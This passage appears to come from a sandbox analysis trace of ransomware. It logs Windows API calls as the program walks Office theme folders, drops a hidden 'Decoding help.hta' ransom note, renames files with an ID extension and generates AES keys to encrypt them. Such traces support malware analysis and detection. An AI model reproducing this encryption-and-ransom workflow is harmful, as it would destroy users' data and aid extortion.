Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0056.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.518] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd98 [0060.518] CreateFileMappingA (hFile=0xd98, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd8c [0060.518] CryptAcquireContextA (in: phProv=0x7e4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x7e4fcec*=0x10e28790) returned 1 [0060.618] CryptGenKey (in: hProv=0x10e28790, Algid=0x6610, dwFlags=0x1, phKey=0x7e4fce8 | out: phKey=0x7e4fce8*=0x10a4aca8) returned 1 [0060.618] CryptExportKey (in: hKey=0x10a4aca8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x7e4fbe4, pdwDataLen=0x7e4fce4 | out: pbData=0x7e4fbe4*, pdwDataLen=0x7e4fce4*=0x2c) returned 1 [0060.618] MapViewOfFile (hFileMappingObject=0xd8c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10da0) Thread: id = 587 os_tid = 0xd70 [0048.680] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*", lpFindFileData=0x7f4fd30 | out: lpFindFileData=0x7f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6712b0 [0053.636] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.636] FindNextFileW (in: hFindFile=0x6712b0, lpFindFileData=0x7f4fd30 | out: lpFindFileData=0x7f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.636] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.636] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.636] FindNextFileW (in: hFindFile=0x6712b0, lpFindFileData=0x7f4fd30 | out: lpFindFileData=0x7f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c2ae00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5f775610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe6c2ae00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xc2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUECALM.ELM", cAlternateFileName="")) returned 1 [0053.638] lstrcpyW (in: lpString1=0x2a738270, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*" [0053.638] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*") returned 72 [0053.638] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\Decoding help.hta" [0053.638] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\decoding help.hta")) returned 0xffffffff [0053.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x64c [0055.308] WriteFile (in: hFile=0x64c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x7f4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x7f4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.053] CloseHandle (hObject=0x64c) returned 1 [0058.053] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.053] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BLUECALM.ELM") returned 1 [0058.053] lstrlenW (lpString="BLUECALM.ELM") returned 12 [0058.053] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*" [0058.054] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*") returned 72 [0058.054] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\", lpString2="BLUECALM.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" [0058.054] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" [0058.054] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0058.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0061.676] CreateFileMappingA (hFile=0x4c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe54 [0061.676] CryptAcquireContextA (phProv=0x7f4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 588 os_tid = 0xd74 [0048.689] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*", lpFindFileData=0x808fd30 | out: lpFindFileData=0x808fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d84d0 [0052.612] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0052.612] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0x808fd30 | out: lpFindFileData=0x808fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.612] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0052.612] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0052.612] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0x808fd30 | out: lpFindFileData=0x808fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f3db00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7f3db00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xda86, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUEPRNT.ELM", cAlternateFileName="")) returned 1 [0052.612] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*" [0052.612] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*") returned 72 [0052.612] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\Decoding help.hta" [0052.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\decoding help.hta")) returned 0xffffffff [0052.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610 [0053.676] WriteFile (in: hFile=0x610, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x808fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x808fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.917] CloseHandle (hObject=0x610) returned 1 [0058.413] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.413] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BLUEPRNT.ELM") returned 1 [0058.413] lstrlenW (lpString="BLUEPRNT.ELM") returned 12 [0058.414] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*" [0058.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*") returned 72 [0058.414] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\", lpString2="BLUEPRNT.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" [0058.414] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" [0058.414] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0058.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc08 [0061.677] CreateFileMappingA (hFile=0xc08, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe5c [0061.677] CryptAcquireContextA (phProv=0x808fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 589 os_tid = 0xd78 [0048.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*", lpFindFileData=0x81cfd30 | out: lpFindFileData=0x81cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0053.624] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.624] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x81cfd30 | out: lpFindFileData=0x81cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.624] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.624] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.624] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x81cfd30 | out: lpFindFileData=0x81cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9250800, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe9250800, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xeafa, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOLDSTRI.ELM", cAlternateFileName="")) returned 1 [0053.626] lstrcpyW (in: lpString1=0x25450550, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*" [0053.626] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*") returned 72 [0053.627] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\Decoding help.hta" [0053.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\decoding help.hta")) returned 0xffffffff [0053.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0055.305] WriteFile (in: hFile=0x5dc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x81cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x81cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.442] CloseHandle (hObject=0x5dc) returned 1 [0056.442] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.736] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BOLDSTRI.ELM") returned 1 [0056.737] lstrlenW (lpString="BOLDSTRI.ELM") returned 12 [0056.737] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*" [0056.737] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*") returned 72 [0056.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\", lpString2="BOLDSTRI.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" [0056.737] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" [0056.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0056.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd74 [0060.622] CreateFileMappingA (hFile=0xd74, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x598 [0060.622] CryptAcquireContextA (in: phProv=0x81cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x81cfcec*=0x10e28a38) returned 1 [0060.623] CryptGenKey (in: hProv=0x10e28a38, Algid=0x6610, dwFlags=0x1, phKey=0x81cfce8 | out: phKey=0x81cfce8*=0x10a4afa8) returned 1 [0060.623] CryptExportKey (in: hKey=0x10a4afa8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x81cfbe4, pdwDataLen=0x81cfce4 | out: pbData=0x81cfbe4*, pdwDataLen=0x81cfce4*=0x2c) returned 1 [0060.623] MapViewOfFile (hFileMappingObject=0x598, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeae0) Thread: id = 590 os_tid = 0xd7c [0048.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*", lpFindFileData=0x830fd30 | out: lpFindFileData=0x830fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671db0 [0053.627] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.627] FindNextFileW (in: hFindFile=0x671db0, lpFindFileData=0x830fd30 | out: lpFindFileData=0x830fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.627] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.628] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.628] FindNextFileW (in: hFindFile=0x671db0, lpFindFileData=0x830fd30 | out: lpFindFileData=0x830fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea563500, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a61ad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xea563500, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x1a537, dwReserved0=0x0, dwReserved1=0x0, cFileName="BREEZE.ELM", cAlternateFileName="")) returned 1 [0053.630] lstrcpyW (in: lpString1=0x2a718250, lpString2="\\\\?\\C:\\Program Files\\Common 